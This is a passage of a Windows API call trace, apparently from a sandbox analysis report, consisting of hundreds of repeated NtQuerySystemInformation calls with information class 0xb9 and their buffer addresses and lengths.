Length=0x20, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0234.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0234.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0234.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0234.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd80, Length=0x20, ResultLength=0x0) [0234.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd10, Length=0x20, ResultLength=0x0) [0234.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0234.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0234.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd00, Length=0x20, ResultLength=0x0) [0234.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x20, ResultLength=0x0) [0234.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0234.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0234.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdab0, Length=0x20, ResultLength=0x0) [0234.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x20, ResultLength=0x0) [0234.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd00, Length=0x20, ResultLength=0x0) [0234.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x20, ResultLength=0x0) [0234.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0234.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0234.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdab0, Length=0x20, ResultLength=0x0) [0234.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x20, ResultLength=0x0) [0234.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd00, Length=0x20, ResultLength=0x0) [0234.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x20, ResultLength=0x0) [0234.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0234.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0234.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdab0, Length=0x20, ResultLength=0x0) [0234.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x20, ResultLength=0x0) [0234.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd00, Length=0x20, ResultLength=0x0) [0234.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x20, ResultLength=0x0) [0234.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0234.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0234.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdab0, Length=0x20, ResultLength=0x0) [0234.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x20, ResultLength=0x0) [0234.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd00, Length=0x20, ResultLength=0x0) [0234.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x20, ResultLength=0x0) [0234.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0234.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0234.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdab0, Length=0x20, ResultLength=0x0) [0234.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x20, ResultLength=0x0) [0234.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd00, Length=0x20, ResultLength=0x0) [0234.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x20, ResultLength=0x0) [0234.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0234.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0234.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdab0, Length=0x20, ResultLength=0x0) [0234.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x20, ResultLength=0x0) [0234.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd00, Length=0x20, ResultLength=0x0) [0234.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x20, ResultLength=0x0) [0234.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0234.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0234.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdab0, Length=0x20, ResultLength=0x0) [0234.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x20, ResultLength=0x0) [0234.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd00, Length=0x20, ResultLength=0x0) [0234.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x20, ResultLength=0x0) [0234.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0234.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0234.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdab0, Length=0x20, ResultLength=0x0) [0234.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x20, ResultLength=0x0) [0234.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd00, Length=0x20, ResultLength=0x0) [0234.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x20, ResultLength=0x0) [0234.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0234.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0234.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdab0, Length=0x20, ResultLength=0x0) [0234.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x20, ResultLength=0x0) [0234.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd00, Length=0x20, ResultLength=0x0) [0234.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x20, ResultLength=0x0) [0234.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0234.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0234.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdab0, 